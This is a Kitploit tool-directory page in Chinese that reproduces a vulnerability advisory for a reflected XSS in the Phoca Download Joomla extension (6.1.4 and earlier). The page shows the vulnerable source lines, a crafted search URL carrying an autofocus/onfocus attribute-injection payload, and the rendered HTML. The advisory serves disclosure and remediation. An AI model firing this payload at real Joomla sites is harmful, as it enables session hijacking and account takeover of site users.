Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-76569 — 通过 Phoca Download 中的搜索 GET 参数实现反射型 XSS | Kitploit
工具/GitHubGitHub/toanln-cov/cve-2026-76569
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubtoanln-cov/cve-2026-76569

CVE-2026-76569

通过 Phoca Download 中的搜索 GET 参数实现反射型 XSS

查看仓库
17小时9分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Phoca Download 中通过搜索 GET 参数导致的反射型 XSS

Phoca Download ≤ 6.1.4 — 已认证攻击者可通过用户控制面板中的构造搜索 URL 执行任意 JavaScript

CVE CVSS v4.0 CWE-79 Affected Researcher


摘要

用于 Joomla 的 Phoca Download(com_phocadownload)在用户控制面板的文件搜索功能中存在反射型跨站脚本(XSS)漏洞。search GET 参数通过 Joomla 的 'string' 过滤器处理——该过滤器仅调用 strip_tags() 并保留 " 字符——随后未经 转义即被回显到 HTML 属性中。攻击者可以注入任意 HTML 属性和事件处理程序,在受害者浏览器加载页面时执行,无需受害者进行任何交互,只需点击构造的链接即可。

htmlspecialchars()
<input value="">

受影响版本

组件存在漏洞测试环境已修复
com_phocadownload≤ 6.1.4Joomla 5 + PhocaDownload 6.1.4 + MariaDB 10.66.1.5

漏洞详情

类型: 反射型跨站脚本(CWE-79) 所需认证: 已注册的 Joomla 用户(已登录)+ 用户控制面板已启用(enable_user_cp = 1) 是否需要 CSRF 令牌: 不需要 — GET 请求,此路径不检查 CSRF 令牌 接收点文件: site/views/user/tmpl/default_files_bootstrap.php

根本原因

search 参数通过 Joomla 的 'string' 过滤器读取,该过滤器仅调用 strip_tags()。这会保留 " 字符,使攻击者能够突破 value="" 属性上下文并注入任意 HTML 属性。

SITE/VIEWS/USER/VIEW.HTML.PHP:252 — 来源

root@kitploit:~
$search_files = $app->getUserStateFromRequest(
    $this->_context_files.'.search', 'search', '', 'string'
);
$search_files = StringHelper::strtolower($search_files);
$lists_files['search'] = $search_files;  // 存储时未进行编码

SITE/VIEWS/USER/TMPL/DEFAULT_FILES_BOOTSTRAP.PHP:56 — 接收点(存在漏洞)

root@kitploit:~
<input type="text" name="search" id="pdsearch"
    value="<?php echo $this->t['listsfiles']['search'];?>"
    class="form-control" />

同扩展中的兄弟视图 phocadownloadlinkfile 正确地对同一搜索字段应用了 PhocaDownloadUtils::filterValue($search, 'text')——等同于 htmlspecialchars()。而 user 视图未应用相同的保护,表明该扩展内部存在输出编码不一致的问题。


概念验证

1. 以注册用户身份登录

导航至 Joomla 登录页面并以注册用户身份进行认证。登录成功后,Joomla 会重定向到用户个人资料页面,确认会话处于活动状态。

以 testuser 身份成功登录 — 重定向至个人资料页面

2. 访问用户控制面板(基线状态)

导航至 PhocaDownload 用户控制面板:

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user

页面渲染时搜索字段为空(value="")。这是注入前的正常状态。

用户控制面板 — 空搜索字段,基线状态

3. 提交包含 XSS 载荷的构造 URL

导航至以下构造的 URL(或直接在搜索框中输入原始载荷):

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user&search=%22%20autofocus%20onfocus%3Dalert%28document.domain%29%20x%3D

将包含 XSS 载荷的构造 URL 提交至搜索参数

页面加载时,注入的 autofocus 属性使输入元素获得焦点,立即触发 onfocus 事件处理程序。无需进一步用户交互。

渲染后的 HTML(存在漏洞):

root@kitploit:~
<input type="text" name="search" id="pdsearch"
  value="" autofocus onfocus=alert(document.domain) x="
  class="form-control" />

影响

  1. 会话劫持 — 攻击者可通过 document.cookie 窃取受害者的 Joomla 会话 Cookie,从而在无需凭据的情况下完全接管账户。
  2. 任意 JavaScript 执行 — 任何 JavaScript 都可在受害者的浏览器会话中执行——键盘记录、DOM 操作、凭据窃取以及重定向至钓鱼页面均有可能。
  3. 权限提升 — 如果管理员在已认证状态下点击构造的链接,攻击者将获得管理员级别的 JavaScript 执行权限,可能通过管理面板操作实现对整个站点的入侵。

参考

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76569
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76569
  • GitHub 安全公告: https://github.com/advisories/GHSA-99wr-9r6w-w242
  • 厂商仓库: https://github.com/PhocaDesign/PhocaDownload
下载工具